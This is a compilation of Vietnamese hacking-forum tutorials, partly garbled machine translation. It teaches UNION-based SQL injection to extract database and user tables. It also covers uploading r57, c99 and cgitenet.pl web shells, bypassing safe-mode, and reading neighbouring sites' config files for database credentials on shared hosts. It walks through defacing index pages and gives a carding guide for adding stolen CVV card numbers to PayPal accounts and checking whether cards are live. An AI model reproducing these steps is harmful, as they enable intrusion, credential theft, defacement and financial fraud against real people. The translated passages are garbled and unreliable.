SQL Injection là gì?

Nó định nghĩa chính nó, nó cho phép thực hiện các lệnh SQL. (trong ngắn hạn)
Phạm discloses thông tin nhạy cảm như người sử dụng, mật khẩu, thông tin thẻ tín dụng, khá nhiều tất cả mọi thứ được lưu trữ trong cơ sở dữ liệu ...

Làm thế nào để kiểm tra xem nếu một trang web là dễ bị tổn thương bình thường sql injection
Nói cho phép chúng tôi có một trang web: http://www.website.com/shop.php?id=10
Chúng tôi có thể thêm vào xe đặc biệt nào để kết thúc như ', ", vv .., điều này sẽ làm cho liên kết:
http://www.website.com/shop.php?id=10 '
Bây giờ, nếu chúng tôi nhận được một lỗi như:
Lỗi cú pháp trong SQL tại ....
mysql_fetch ......
mysql_num .....
Và các công cụ như thế, bạn sẽ có được những bức tranh tôi hy vọng ....
Sau đó, nó thường là do các trang web là dễ bị tổn thương.

Bây giờ, chúng tôi biết từ các trang web là dễ bị tổn thương, chúng tôi đã đi qua một vài bước sau để có được những thông tin mà chúng tôi đang tìm kiếm, chúng là:
Mã số:

1. Tìm số lượng các cột
2. Kiểm tra nếu làm việc UNION.
3. Tìm kiếm một thể nhìn thấy cột
3. Kiểm tra xem phiên bản> 5
4. Extracting bảng tên, cột tên, vv .. (Bruteforcing Hoặc nếu là phiên bản <5)
5. Hình thành các truy vấn kết thúc để trích xuất của chúng tôi thông tin cần thiết.

Tìm số lượng các cột
Để tìm số lượng các cột, chúng tôi có thể sử dụng của ĐẶT HÀNG, miễn là nó isnt lọc được.
http://www.website.com/shop.php?id=10
Nếu đó là trang web của chúng tôi dễ bị tổn thương .... chúng tôi lần đầu tiên thử nghiệm, nếu đặt hàng của isnt lọc.
+ + http://www.website.com/shop.php?id=10 lệnh của +1- - (shouldnt Bạn nhận được lỗi nào)
+ + http://www.website.com/shop.php?id=10 thứ tự của +10000- - (Bạn sẽ nhận được một lỗi)
Nếu bạn làm thế, thì bạn cũng tốt và tiếp tục ..
+ + http://www.website.com/shop.php?id=10 lệnh của +2- --
+ + http://www.website.com/shop.php?id=10 lệnh của +3- --
+ + http://www.website.com/shop.php?id=10 lệnh của +4- --
+ + http://www.website.com/shop.php?id=10 lệnh của +5- - <--- incrementing Giữ cho đến khi bạn nhận được một lỗi, cho tôi khi các lệnh của 5 (trong thế giới của tưởng tượng ).

Mã số:

Sau đó, số lượng các cột là số trước khi lỗi, trong trường hợp của tôi 4.
Giữ incrementing số như thế cho đến khi một trong những mỹ ngày bạn nhận được một lỗi, đau isnt it?
Nếu bạn đã có thể giúp bạn thông minh ra phương pháp khác .... kiểm tra của nó, nếu từ 1 đến 10, và sau đó làm 10-20,20-30 **** như thế ... nhưng bây giờ chỉ cần giữ cho đến khi bạn nhận được incrementing một lỗi.

Bây giờ, nếu bạn biết số lượng các cột, bạn có thể tạo thành công đoàn yêu cầu tìm kiếm:
http://www.website.com/shop.php?id=10 là trang web của chúng tôi
Nếu số lượng các cột của chúng tôi là 4 (như trong trường hợp của tôi) sau đó chúng tôi lựa chọn công đoàn 1,2,3,4 (Chúng tôi có thể thay thế các số điện thoại, điều này chỉ là để truy cập)
http://www.website.com/shop.php?id=10 + u ... +1,2,3,4 --
Điều đó sẽ được kết thúc của chúng tôi liên kết.
Bây giờ, chúng ta phải tìm một thể nhìn thấy cột ....
Hãy tìm một số, tôi là đảm bảo rằng bạn có thể thông báo ....... nó cần được nhìn thấy các cột ...
Chọn nó, ví dụ như nếu bạn thấy con số 2 trên trang web, đó là nhìn thấy cột ..
http://www.website.com/shop.php?id=10 + u ... LUMN ,3,4 --
Chúng tôi có thể sử dụng nó để trích xuất thông tin.


3. Kiểm tra xem phiên bản> 5
Chúng tôi cần phải kiểm tra xem là phiên bản> 5 (RẤT RẤT QUAN TRỌNG BƯƠC)
Để làm được điều này, chúng tôi lựa chọn của chúng tôi nhìn thấy cột ... trong trường hợp này là 2 ... và chúng tôi thay thế nó bằng phiên bản @ @
http://www.website.com/shop.php?id=10 + u ... Sion ,3,4 --
Nếu bạn gặp một lỗi như bất hợp pháp kết hợp của collations blah blah blah blah và cho các hoạt động 'UNION' Trong một số trường hợp hiếm hoi hay bất kỳ lỗi, bạn có thể sử dụng:
http://www.website.com/shop.php?id=10 + u ... (@ @ version)) ,3,4 --
http://www.website.com/shop.php?id=10 + u ... (@ @ phiên bản bằng cách sử dụng latin1) ,3,4 --
Bây giờ, bạn sẽ thấy các phiên bản ....
Bạn nên đầu tiên hãy kiểm tra xem nếu CNTT lớn hơn 5, ngay bây giờ ..
Nếu có, bạn có thể tiến hành hoặc bạn có đoán TABLE NAMES NẾU NHỮNG NGƯỜI BÊN DƯỚI phiên bản 5.
Bây giờ, nếu bạn biết phiên bản cao hơn 5 sau đó, chúng tôi có thể tiếp tục hoặc bạn sẽ cần phải Goto cuối này đoán tốt hướng dẫn về kỹ thuật.


4. Extracting bảng tên, cột tên, vv ..
Bây giờ, từ information_schema hiện có sẵn trong các phiên bản là lớn hơn 5, chúng tôi có thể sử dụng nó để nhận được:

Mã số:

1. Cơ sở dữ liệu tên
2. Bảng tên
3. Cột tên
Cơ sở dữ liệu nhận được các tên:

Bây giờ chúng tôi sẽ nhận được phiên bản và tên cơ sở dữ liệu người sử dụng tất cả các từ với nhau, chúng tôi biết được nhìn thấy cột (nhìn thấy cột như đã nói với tôi trước khi đi là để giúp chúng tôi nhận được dữ liệu, chúng ta cần).

Mã số:

+ http://www.website.com/shop.php?id=10 công đoàn chọn +1, concat_ws (0x3a, phiên bản (), người sử dụng (), cơ sở dữ liệu ()), 3,4 --

Trong hầu hết các hương dân chúng sử dụng "concat_ws" và có rất nhiều newbies confuse với điều đó. Nó thực sự có nghĩa là với concat separator separator và chúng tôi sử dụng phải được đưa ra trong đầu của các cú pháp. Ở đây tôi có được sử dụng 0x3a tương đương là ":". Các mục đích chính của việc sử dụng này là nhận được kết quả mong muốn định dạng trong khi chúng tôi cần nó để được.
Phiên bản ()-đề cập đến phiên bản của Mysql được sử dụng trong các máy chủ
Người sử dụng () - đề cập đến Mysql người dùng đã đăng ký trong cơ sở dữ liệu.
Cơ sở dữ liệu () - Tên cơ sở dữ liệu
Nó sẽ nhận được đầu ra ở định dạng 5,034-debian_7etch-đăng nhập: h4cky0u @ localhost: h4cky0u.
Bây giờ chúng tôi đang sử dụng để grab Information_schema tên cơ sở dữ liệu (S).
+ + http://www.website.com/shop.php?id=1 UNION CHỌN +1, group_concat (schema_name), từ 3,4 + + information_schema.schemata -
Trong những nơi dễ bị tổn thương cột của chúng tôi là bằng cách sử dụng lệnh để lấy lại dữ liệu
group_concat (expr) sẽ đem lại một chuỗi kết quả với các concatenated không Null các giá trị từ một nhóm.
và ở phần cuối của các cột, chúng tôi sẽ thêm
+ + từ information_schema.schemata-trả lại các cơ sở dữ liệu trên máy chủ
Chúng tôi có thể nhận được tên cơ sở dữ liệu không phụ thuộc vào các cơ sở dữ liệu hiện tại.
Giống như bạn sẽ có information_schema, h4cky0u, cơ sở dữ liệu, mysql, người sử dụng.
Đây là những cơ sở dữ liệu tên.
Extracting bảng tên:
Bây giờ, từ cơ sở dữ liệu mà chúng tôi biết tên ...... chúng ta cần phải nhận được bảng tên cho các cơ sở dữ liệu.
Tôi đã chọn cơ sở dữ liệu 'của người sử dụng để trích xuất bảng tên của chúng tôi.
Để nhận được bảng tên, chúng tôi đã sử dụng cơ sở dữ liệu information_schema và bảng bảng và cột table_name để trích xuất các bảng tên.
Vì vậy, trang web của chúng tôi là website.com
+ + http://www.website.com/shop.php?id=1 UNION CHỌN +1, group_concat (table_name), từ 3,4 + + information_schema.tables -
Điều này mang lại cho chúng tôi bảng mà chúng tôi không cần phải quá, chúng tôi chỉ muốn bàn cho các bảng người sử dụng.
Vì vậy: http://www.website.com/shop.php?id=1 + + UNION CHỌN +1, group_concat (table_name), từ 3,4 + + + information_schema.tables nơi table_schema + = 'users' -
Đôi khi, bạn cần phải hex nó: Nó sẽ trở thành http://www.website.com/shop.php?id=1 + + UNION CHỌN +1, group_concat (table_name), từ 3,4 + + + information_schema.tables nơi + table_schema = 0x7573657273 -
Điều này mang lại cho chúng tôi tất cả các bảng tên. Bây giờ chúng tôi lựa chọn một bảng hoặc một USEFUL bảng mà từ đó chúng tôi muốn trích xuất thông tin. Tôi sẽ đưa người sử dụng bảng, ví dụ.


Extracting cột tên:
Bước kế tiếp là để có được các cột trong các bảng biểu mà thực sự giữ dữ liệu. Chúng tôi đã được tìm thấy có thể có một bảng tên "người sử dụng" và chúng tôi trích xuất các cột từ nó.

+ + www.website.com/shop.php?id=10 UNION SE ... olumn_name), từ 3,4 + + + information_schema.columns WH ere + table_name = 'USERS' --

Một lần nữa chúng tôi thay thế dễ bị tổn thương cột số với các lệnh sau.
group_concat (column_name), chúng tôi sẽ thay thế các cột số 2 với này
column_name extracts tên nay tất cả các cột trong bảng.
Và thêm này vào ngày cuối cùng của cột
information_schema.columns từ: + + + + nơi table_name = 'USERS' -
Nó sẽ hiển thị các cột trong bảng. Nếu nó hiển thị một lỗi như thế
Không hợp lệ yêu cầu tìm kiếm: bạn có một lỗi trong cú pháp SQL của bạn, hãy kiểm tra bằng tay mà tương ứng với máy chủ của bạn Mysql phiên bản quyền cú pháp để sử dụng ở gần 'USERS'-' ở dòng1.
Laøm chaäm này và các quy trình của chúng tôi xuống. Tất cả chúng tôi phải làm là để có được một số trực tuyến hexadecimal công cụ chuyển đổi và chuyển đổi bảng tên

chúng ta thường local shell qua server cần attack thì chúng ta dùng lệnh cp [path host1 ] [host2]
cp = copy , đơn giản là chúng ta copy cái file shell ở host1 qua host 2 giống như chúng ta dùng lệnh copy 1 tập tin từ hda qua hdb .
còn về Chmod là các phân quyền trong hệ điều hành của máy server, trong linux thì permision sẽ được chia làm nhiều cấp bậc , cao nhất là root , đến owner group , và cuối cùng là đến Other , thường thì nếu các server Chmod kỹ sẽ không cho Other được bất cứ quyền gì.Gowner Group sẽ có được một số quyền hạn giống như root ở một số tập tin, còn Root (gốc rễ, ông vua) là người có toàn quyền trên server.
Và từ đó chúng ta có thể định hình được Chmod chỉ đơn giản là các quyền cho phép đối với người dùng.
Chmod được chia ra làm 4 chế độ:
1. r (read) :Quyền đọc , người được quyền này sẽ đọc được các tập tin nhưng không được viết (sửa đổi ), hoặc thực thi.
2. w (write ) : quyền viết , người có quyền này sẽ có thể sửa đổi các tập tin.
3.x (execute): quyền thực thi.
4. và cuối cùng là _ : tức là không có quyền gì cả = Null
vd : _rwxrwxrwx index.php
tức là tất cả mọi người dùng đều có toàn quyền trên file index.php
_rwxr_xr__ index.php
Chỉ có root (owner) mới được toàn quyền , Owner Group được quyền đọc và thực thi nhưng không được quyền ghi, Other được quyền đọc và thực thi nhưng không được quyền ghi
Nhưng để tiện hơn trong việc phân quyền thì người ta gán cho chúng những con số .
r = 4
w = 2
x = 1
như vậy nếu 1 file được chmod 755 tức file đó sẽ tương đương _rwxr_xr_x


_cách bypass bằng mysql chỉ dùng với user nobody , vì với các user bt thì thường mysql nó phân quyền ko truy cập File qua lẫn nhau đc

_khi sv bật cURL On : ta có thể Eval đoạn php code sau để view File , vd:
_ko Dis fopen
_
quy định đuờng dẫn save file passwd mà ta có quyền ghi

_dùng hàm gzfile, readgzfile, gzopen nữa, chức năng nó tương tự như các hàm file, readfile, fopen

_Nếu gặp trường hợp SV bật Safe-Mode và có thể là Disable một số hàm quan trọng:
Xem xét lại nếu SV cho phép upload hoặc tạo thư mục mới hay ko( chú í tới uid nếu uid=owner thì ổn cả).
Tạo 1 thư mục mới và chmod cho nó là 775( dùng để up con cgitenet.pl).Đây là con shell dùng perll script nên dù Safe-Mode hay dis các hàm php thì cũng không ảnh hưởng gì tới các chức năng script của con perl này.
Up con cgitenet.pl này lên host của victim ( nên dùng shell là r57 ) .Trong phần Download files from remote ftp-server của con r57 điền thông tin con cgitenet.pl trên host của ta vào( host chứa perl shell của mình phải hỗ trợ upload qua FTP )
FTP-server:
Login:
Password:
File on ftp:
Local file:
Transfer mode: ASCII

Chú ý : riêng con perl shell này thì Get về host victim phải chọn chế độ ASCII
chmod lại cho cgitenet.pl lại thành 775.
Sau đó chạy shell cgitenet.pl trên SV của victim là ổn .

Tình hình là em vừa mới hiểu ra thế nào là local nên em pót luôn theo đề nghị của nhiều anh em . Có lẽ em làm bài này chỉ để cho những ai chưa hiểu tí j` về shell ( như em hôm qua ) nên mong các bác đừng chê cười và nếu có rì thiếu sót mong các bác bổ sung.
Bài này em sẽ nói những cái gọi là siêu siêu siêu ... cơ bản về r57 (những cái mình ko nói là phải tự học lấy nhá ) .
I. Cơ bản về r57.
1. Các thông tin ta có thể thấy đc qua shell.
- Safe-mode: On => Đây là chức năng bảo mật bật. Cái này chỉ có 2 kiểu là bật (on) và tắt (off) (đương nhiên) và rõ ràng là khi dùng shell thì vớ phải thằng safe-mode off dễ ăn hơn thằng on.
- PHP version: 4.4.6 cURL: ON MySQL: ON MSSQL: OFF PostgreSQL: ON Oracle: OFF => Đây là các chức năng của trang web đc bật hay tắt ( nhìn thì tự biết ).
- Disable functions: Đây là các hàm nó cấm ko cho sử dụng. Nếu là NONE thì nó chẳng cấm thằng nào. Còn như ở ví dụ trên nó cấm sử dụng các hàm : ini_alter,system,passthru,shell_exec,leak,listen,c hgrp,apache_setenv,define_syslog_variables,openlog ,syslog,ftp_exec.
- HDD Free : 85.49 GB HDD Total : 4733.08 GB => cái lày có cần nói ko nhỉ ???
- Ở cái hộp ngay bên dưới có quả "uname -a : Linux v8 2.6.18.1-grsec+e+f6b+gr219+opt+c4a+gr2b-grsec #1 SMP Thu Oct 19 12:50:29 PDT 2006 i686 GNU/Linux" => Thằng này nó dùng hệ điều hành GNU/Linux ( Chả hiểu j` nhưng thấy trên mấy trang cho tải hđh linux hay có cái GNU này )
- pwd : /home/.orzo/myebuddy/MY-IDIR.COM ( drwxr-xr-x ) => Mình đang ở trong thư mục /home/.orzo/myebuddy/MY-IDIR.COM. Còn cái drwxr-xr-x là mấy cái quyền của mình ở trong thư mục này đã đc thằng admin nó chmod từ trước ( ko biết đã chính xác chưa ).
- Và còn 1 ô ở ngay dưới rất hoành tá tràng là "Executed command", ở đó bao gồm có 10 cột nhưng chỉ cần chú ý nhất vào 2 cột đó là cột thứ 2 và cột thứ 10.
+ Cột thứ 2 : Nó ghi các quyền của mình có thể làm đc j` với file hoặc thư mục ở cột thứ 10. VD: drwxrwxrwx => chmod 777 hay còn gọi là owner user tức là toàn quyền với file hoặc thư mục đó nhưng gặp đc cái thằng như thế này có lẽ chỉ vài lần trong đời
+ Cột thứ 10 : Nó liệt kê các file và thư mục trong cái thư mục cắm con shell ( ở đây là /home/.orzo/myebuddy/MY-IDIR.COM ) và tất nhiên sẽ thấy luôn cả con shell
2. Làm việc trong r57.
- Run command (ngay dòng đầu tiên) : ô này để đánh các lệnh để chạy shell trong trường hợp này là các lệnh trong linux (cái này thì phải tìm hiểu). Nếu shell nó thông báo là server bật chế độ bảo mật (safe-mode on) thì dòng này sẽ ko có.
- Work directory : Đây là nơi mình đang làm việc (con shell đang ở trong thư mục này). Ở dòng này các bạn chỉ đánh đc tên của các thư mục mà mình muốn vào, còn muốn sem file hay chỉnh sửa file thì phải dùng đến dòng bên dưới. Trong trường hợp này mình đang làm việc trong thư mục và /home/.orzo/myebuddy/MY-IDIR.COM. Nếu bạn muốn vào thư mục daulom thì cần phải đánh /home/.orzo/myebuddy/MY-IDIR.COM/daulom rùi ấn vào Execute.
- File for edit : Nếu bạn muốn sem hoặc sửa 1 file ( mình khoái nhất là sửa file index ) thì sẽ đánh tên file đó vào. Ví dụ bạn muốn sửa file index.html ở trường hợp này bạn cần đánh /home/.orzo/myebuddy/MY-IDIR.COM/index.html rồi ấn vào edit file. Tuyệt đối ko nên nhầm lẫn thằng này với thằng work directory ở bên trên. Cần hiểu rõ rằng thằng này chỉ dung để đọc hoặc sửa file, còn thằng bên trên thì chỉ dung để đi ra hoặc vào 1 thư mục.
- Mấy cái find fủng với upload ở bên dưới thì bạn tự hiểu nhá.
- Đến phần Database:
+ Ô login : Điền dbuser.
+ Password: Điền dbpass.
+ Database: Điền dbname.
Muốn có những thong tin để điền vào mấy cái ông bên dưới này thì phải tự tìm hiểu thôi, mình cũng chẳng biết hướng dẫn thế nào nữa .

II. Local hack.
Hờ, cái này thì cũng đơn giản thôi, ko quá khó như mọi người vẫn tưởng ( theo bác backdoor là kiểu hack dễ nhất ). Cái thể loại local chỉ đơn giản như ở trong win chuyển từ thư mục này sang thư mục khác thôi. Trên server mỗi trang web nằm trong các thư mục khác nhau. Bạn chỉ việc chuyển từ thư mục đang có con shell sang 1 thư mục bên ngoài khác (cái này đọc kĩ phần Work directory nhá) rồi tự nhiên thấy 1 user của 1 trang web nào đó rồi đi vào thư mục đấy rồi vào phần edit, sửa lại cái index rồi ... Thế là song ---->>> Deface website auHang:

+thứ 1:
SQL injection thì phân biệt mysql injection và mssql injection là chính
còn php và asp chỉ là vấn đề phụ(gần như giống nhau)...1 số bạn lại nhầm tưởng
+thứ 2:
UNION dùng để kết nối 2 mệnh đề SELECT có hỗ trợ cả mysql và mssql nên có thể xài ở mọi trường hợp
+thứ 3:
mysql kết hợp tốt với php nên thông thường các bạn hack site php chỉ gặp mysql...nhưng ko tuyệt đối là thế mà có thể là mssql,oracle....
+thứ 4:nói thêm (có sai thì mấy pro góp ý)
VD:id=1 các bạn sửa lại thành id=-999 or id=null làm gì?
để mệnh đề SELECT thứ nhất ko trả về kết quả
giả sử trên 1 page có 3 chỗ echo ra kết quả mà SELECT thứ nhất trả về 3 kết quả thì hết chỗ...SELECT thứ 2 tuy trả về kết quả nhưng ko có chỗ echo ra
+thứ 5:
cấu trúc UNION:
VD trên nghĩa là type các column trong 2 mệnh đề SELECT phải giống nhau

Áp dụng:
=> nghĩa là nó sử dụng sql server or mssql
attack = UNION nha
đầu tiên đếm column đc 4 column
type khác nhau
null ko có type nên bypass tốt
DISTINCT là gì thì các bạn tự tìm hĩu (đơn giản là lọc kết quả trùng nhau)
để khắc phục thì xài union all select
kế típ dò type từng column
vẫn bt =>column type int(thường là ID mà )
ra số 2 đẹp đẹp
báo lỗi nên change thành '3','a',.. gì đó miễn là type char
=> hình như bị magic quote(là gì thì tìm hĩu )
=>chuyển thành
tương tự
tiếp theo chắc các bạn bít roài
---hết---

Hôm nay, vào 1 topic, thấy 1 số bạn vẫn chưa bik local , nên mình mạn phép viết 1 topic, dù mình rất gà, nhưng cũng xin viết tut cho những bạn như mình
ok :
sắn có shell, làm luôn
Code:

http://74.54.136.66/~yeubz/abc/c99.php

mình quen sài shell c99
bây giờ,giả sử như ta chưa có shell đúng hem
muốn attack 1 site có nhiều cách, nhưng những cách sau newbie tụi mình hay làm
1) tìm bug ngay trên victim
2) nếu victim ko có bug, ta tìm site cùng server local chơi
mình đang muốn nói cách 2 trong topic này
giả sử victim của ta ko có bug, làm jì đây
mình whois xem hàng xóm của nó thử coi
Code:

http://crushmachine.com/rip.php?host=74.54.136.66&page=6

chắc chắn các bạn sẽ thấy nhiếu site, ta tìm bug trên từng site,sau đó tìm cách up 1 con r57 or c99 để local
giả sử mình tìm dc 1 thằng này đó có bug, up dc shell. Trong tay có shell, làm jì nhỉ
chơi thoai
Code:

http://74.54.136.66/~yeubz/abc/c99.php

ok, mình bắt đầu với lệnh
Code:

cd /etc/valiases && ls -lia

lệnh này tìm user cùng site của user đó
khi nó hiện ra, ta tìm victim cần local
giả sử ta dùng luôn thằng yeubz ha, mà site này cũng có sex, tui ghét sex lắm . OK , ta dùng lệnh sau
Code:

dir /home/yeubz/public_html/

bạn bik jì về lệnh này, nếu ko bik xin vui lòng đọc tài liệu ok
sau khi ta vào dc thư mục, thì ta thấy các thư mục, các file, tệp, dùng ệnh này để đọc, vidụ như :
Code:

cat //home/yeubz/public_html/abc/config.php

ở đây nếu file ko bị chmod kĩ, thì ta có thể view dc ìno trong đó vd:
Code:

$db_config=array("host"=>"localhost","port"=>"",
"user"=>"demo",
"pass"=>"123456","database"=>"qanh_quanganh");
$common_config=array();
$common_config['product_per_page']="12";
$common_config['member_per_page']="10";
$common_config['guestbook_per_page']="5";
$common_config['support_email']="support@quanganh.com.vn";
$common_config['contact_email']="info@quanganh.com.vn";
$common_config['sales_email']="sales@quanganh.com.vn";
$common_config['axiom_per_member']="10";
$common_config['stories_per_page']="5";
$common_config['page_per_page']="10";
$common_config['diary_per_page']="5";
$common_config['num_free_picture']="10";
$common_config['allow_free_planner']="1";
?>

d0ây là file mình up lên để demo , khi các bạn có info của data, thì mình connect tới SQL, điền đầy đủ thông tin
con các bạn muốn deface, thì mình phải có quyền
Code:

uid=32119(yeubz) gid=32122(yeubz) groups=32122(yeubz)

như thế này, các bạn có thể xóa fiel index để thay = file của mình, mình up dc file ảnh
Code:

http://74.54.136.66/~yeubz/abc/deface.JPG

vậy thui, còn nhiều nữa, mình chỉ dẫn những cái cơ bản thui, khi nào đó rảnh mình làm cái video local basic cho các bạn nha , giờ đang bận thi hk
the end , đừng chê nha các anh

Có thể nhiều anh em vẫn chưa hiểu rõ lắm Paypal là gì,nhưng kệ nói cụ thể ra Paypal là một dạng tài khoản bank online cho phép anh em có thể sử dụng để trao đổi mua bán hàng qua mạng như mua hosting,mua vật dụng gia đình hay nói thẳng ra là mua luôn cái Laptop về post bài cho anh em hehehe ... đùa tý thôi. Bài này do tớ tự viết tút ko ăn cắp thêm bài của ai cả,đảm bảo hàng ko đụng,viết đơn giản mà dể hiểu mong anh em cổ vũ thêm để post thêm nhiều bài hướng dẫn khác .thanks for see it .
Yêu cầu : Một hòm mail bất kì,ít nhất một con CVV chưa add Paypal lần nào,và còn sử dụng được (đại loại là good CVV ) ,thường ở các bài hướng dẫn khác,họ đòi phải fake IP nhưng mà mình đã thử nhiều lần rồi,tự thấy chả cần,chỉ khi nào bạn chuẩn bị pay thì lúc đó mới phải fake IP,còn đâu cứ để IP trần đỡ mất thời gian check sock hay là proxy,và vào mạng lại nhanh nữa giải quyết thêm được bao nhiêu việc chứ ít đâu hehe ...
Đăng kí hòm mail : lấy tên bất kì,có đuôi .vn cũng chả sao,user name bất kì chả liên quan đến thằng chủ thẻ cũng chả mất gì của bọ.Riêng chú ý một chút khi điền first name và last name thì nên lấy tên thằng chủ thẻ thì nó khó bị die Paypal hơn (còn lấy tên của mình cũng chẳng phải là dễ bị die,nhưng cẩn thận vẫn là trên hết ),nếu nó đòi điền address thì cũng điền luôn của thằng chủ thẻ.
Đăng kí Paypal :
bạn vào site hxxp://www.paypal.com vào phần signup bước này cũng là bước quan trọng này . bạn chọn " Personal Account " .Ở mục " Select the country or region where you live " bạn chú ý một chút,vì cái này liên quan đến cái thẻ của bạn thuộc nước nào ,bởi vì PP ko chỉ cho add một thẻ mà cho add rất nhiều thẻ, nhưng phải cùng một quốc gia với user đăng kí vì vậy nếu bạn có CVV của UK thì bạn đăng kí country là UK ,nếu của US thì đăng kí country là US ... nói chung là có thẻ của quốc gia nào thì đăng kí country ở quốc gia đó, nhưng tớ thấy nhiều nhất vẫn là country US và ở bài viết này tớ chọn là US.
click " continue "
phần này cũng quan trọng bởi nó sẽ là một bước định đoạt con PP của bạn sẽ sống lâu hay chết yểu vì vậy hãy chú ý một chút bài post này của tớ là ok.
first và last name : điền theo tên ở trên mail của bạn, add cũng theo như mail thì tốt hơn, city, state, zipcode phải đi kèm với nhau bởi nếu không sẽ không qua được bước tiếp theo,số điện thoại bất kì ở bang nào của Mỹ cũng được,thương có định dạng như sau 270-xxx-6xxx (dùng bản yahoo beta 7.5).
phần email điền địa chỉ email của bạn ở trên,điền đụng địa chỉ email,vì đăng kí xong PP sẽ gửi link active hoặc active number cho bạn, pass word thì phải đủ 8 kí tự trở lên, phần câu hỏi và trả lời như kiểu sicurity thì các bạn nên chọn phần mother name, và city of birth là dể nhất, nhanh gọn.
tích vào 2 ô ở dưới, tớ tiếng Anh kém nên cũng không rõ nó là cái gì,đại loại là tôi đồng ý với những lời khai ở trên thì phải hehe...
phần còn lại điền number bảo mật ở trong ô là ok.
khi đã login vào trong rồi các bạn có thể dễ dàng thấy mục " Confirm email " click vào đó, thấy dòng chữ " note : Click here if a link does not appear in the email."(tạm dịch: click here nếu như dòng link active của email ko làm việc được) click vào đó rồi mở mail lấy số confirm number có dạng như sau" 136xxx-0761-xxxx-1548" rồi click vào confirm . ok paypal của bạn đã được active. ấn vào skip để tiếp tục (thực ra nhấn skip để mình chuyển qua bước tiếp theo cho nhanh để add CC,còn nếu bạn có bank online thì có thể active được từ bước này...nhưng bài này tớ viết về add CVV,bài add bank online sẽ viết tút cho newbie sau )
Add Credit Card: bước này là bước cuối cùng và cũng là một cách cho các bạn check CC die hay là live .
click vào add credit card: vì tớ chưa biết con CVV của tớ đã được add hay chưa, và nó đã die hay chưa nên trong mục này các cậu ko cần quan tâm đến địa chỉ của thằng chủ thẻ vội, tên của thằng chủ thẻ thì bỏ qua luôn vì khi cái CVV của thằng chủ thẻ có tên trùng với con PP của cậu die rồi thì cậu phải add CVV khác,và điều quan trọng duy nhất là con CVV phải live,còn info có thể bị sai lệch một chút sẽ có bước tiếp theo
ở bước này các cậu chỉ cần gõ vào đó card number,exdate,Card Verification Number ...

+) nếu như nó báo thế này : We were unable to verify the billing address for this credit card. Please enter the address where you receive billing statements for this credit card below. Please refer to the automatic email we have sent to assist you. ---> Quá là ok rồi,con CVV này good rồi,bước tiếp theo chỉ việc thay billing address thôi, tick vào phần "Enter a new address as billing address " rồi gõ đúng địa chỉ của thằng chủ thẻ là ok bạn đã có một con PP để đi ship hàng .,Sau khi add xong nó sẽ hiện lên dòng này ở trên đầu " You have successfully added a credit card. Please note that this credit card is now your primary card. For more information on your primary card, please refer to your Profile."
+) nếu nó báo như thế này thì card có vấn đề : Before you can add this credit card to another account, you must contact the PayPal Credit Card Team at cardproblems@paypal.com. A customer service representative will respond to your request shortly. If you would rather add a different credit card to your PayPal account, you may do so at any time. Thank you for your cooperation. Lúc này thì bỏ qua con này đi,chả mua sắm được gì bằng con này đâu.
hoặc nó báo : This credit card has been denied by the bank that issued your credit card. For details on why your card was denied, please contact your credit card issuer's customer service department. Or, you may want to try adding a different credit card
thì con này đã tử trận, thằng chủ thẻ nó đã phong tỏa cái thẻ rùi .
+) nếu nó báo thế này : That credit card number is already assigned to another PayPal account. For security purposes, each credit card may only be assigned to one PayPal account. Please use a different card. tức là con PP này được add vào tài khoản khác rồi,nhưng vẫn sống,tức là mình vẫn có thể dùng CVV để mua đồ ở các shop cho mua bằng CVV rồi.
Trên đây là những hướng dẫn sơ đẳng cho newbie biết cách add CC vào paypal.
*) Chú ý : như lúc trước tớ nói,nếu như khi add CVV,nó vẫn báo : We were unable to verify the billing address for this credit card ... mà khi bạn điền billing vào thì bị sai info của giữa zipcode và city với state thì sao nhỉ ?chẳng lẽ lại vứt ? không nên phí hoài,các cậu lúc này nên giữ nguyên cái Address,và dùng thêm tools CC2bank để bịa zipcode(Hoặc vào
http://www.brainyzip.com/
Ví dụ để tìm ADD của con này 48125 thì gõ như vậy
http://www.brainyzip.com/zipcodes/48/48125.html
Từ đó suy ra nhé
Hoặc đơn giản hơn là dùng thanh search ở góc trên đó
), khi đã có một zipcode thật và có city,state của zipcode đó thì các cậu có thể thay vào làm info của thẻ cũng được. Có thể các bạn hay nghi ngờ nhưng tớ cũng thường xuyên gặp phải trường hợp này và đã thử nhiều lần rồi,đều 100% add được CVV vào PP,nhưng nếu dùng con CVV để ship hàng thì chắc chắn là không được,con này khuyên các cậu nên mua netphone mà sài,như skype,globe7 ... đảm bảo mua được 100%.
Bài viết này do tớ tự viết tút tặng anh em,do tiếng Anh ko chuẩn nên dịch nhiều chổ còn sai sót,mong anh em pro thông cảm và chỉ bảo thêm,chỉ xin bạn một cái thanks sau khi đọc bài này (Made by batcoctongtien )
Muốn đăng kí được paltak phải có những thứ sau:
- socks5 còn sống, không nhất thiết phải backlist
- sockscap32 để chạy được paltak lúc đăng kí bằng socks của mình
- cvv2 còn sống
sau khi đăng kí, vào trang web của nó để upgrate bằng cvv2 và socks5
Muốn thử xem ccv đã add hay chưa, các bạn lấy mail trong con cc đó, vào sign in của pp, điền cái mail vào>> forgot nếu cc add rùi thì nó sẽ báo sẽ có confirm đến mail,nếu chưa add thì nó bảo là invailed (như kiểu ko có giá trị đo). Cái này là dựa trên tâm lý chủ card nó hay dùng 1 địa chỉ email mà thui.
Unverified Làm ....
1. socks ngon
2. cvv2 xịn
3. Unverified vẫn làm được khối thứ .
Như là chuyển tiền sang veri nè, nó làm gì có phone verify đâu. Nó chỉ phone khi... rửa tiền cấp quốc tế chẳng hạn.
Muốn verify PP thì chỉ có cách add bank vào để verified mà thôi. Muốn kiếm bank thì có 2 cách:
1. hack (or scam) bank
2. Nhờ ai đó bên US làm cho cái bank mà verified. (cái này thì chỉ cần có người thân bên đó là làm được thôi mà. Mất 1-2 ngày là có cái bank liền.). Bên cạnh đó nếu có cc full info thì có thể dùng PP veri (hack or scam) để open 1 cái bank online tại đây hxxp://www.bank-account-usa.com
Ngoài ra còn có thể tham khảo 1 vài bank đại lý của US ở VN như citybank, eximbank.
Muốn làm PP balance thì tạo 2 cái PP add cc vào. Sau đó dùng tiền từ PP này send qua PP kia là có PP balance rồi.
Muốn xử lý sự cố: ”Enter Expanded Use Number”
Hi đó là do ip của bạn đó! xin thành thật chia buồn, giờ phải có con bank mà vô đó xem mới đc.
Sorry anh em,bài này tự tay tớ viết tút cho anh em do kinh nghiệm có được khi sử dụng,có một số sai sót như sau nên sửa một chút .
- vì tớ ko ở VN nên tớ thường lập và add pp bằng ip trần,ko fake (china)
